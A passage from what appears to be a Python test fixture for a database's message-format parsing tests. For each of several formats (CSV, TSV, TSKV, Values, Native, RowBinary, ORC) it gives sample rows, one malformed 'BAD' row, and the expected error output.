'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception.: while executing 'FUNCTION CAST(assumeNotNull(_dummy_0) :: 2, 'UInt16' :: 1) -> CAST(assumeNotNull(_dummy_0), 'UInt16') UInt16 : 4'"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0